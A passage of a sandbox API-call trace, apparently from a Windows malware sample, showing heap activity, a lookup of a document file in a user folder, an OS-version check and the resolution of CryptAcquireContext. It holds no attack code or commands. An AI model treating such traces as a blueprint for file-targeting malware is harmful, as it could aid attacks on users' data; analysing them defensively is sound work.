dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0221.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0221.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0221.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.715] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wdchYxA7KRrFzTiR.odp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd8d4f0, ftCreationTime.dwHighDateTime=0x1d5cfda, ftLastAccessTime.dwLowDateTime=0xa8779d00, ftLastAccessTime.dwHighDateTime=0x1d5cf8c, ftLastWriteTime.dwLowDateTime=0xa8779d00, ftLastWriteTime.dwHighDateTime=0x1d5cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x318d, dwReserved0=0x0, dwReserved1=0x0, cFileName="wdchYxA7KRrFzTiR.odp", cAlternateFileName="WDCHYX~1.ODP")) returned 0x9e1bf8 [0221.716] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0221.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.717] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0221.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.717] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.718] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0221.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.718] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.718] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.718] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.718] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0221.719] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.719] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.719] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.720] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.720] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0221.721] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0221.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.721] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.721] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0221.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.721] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.721] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0221.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0221.722] WideCharToMultiByte (in: CodePage=0x0, 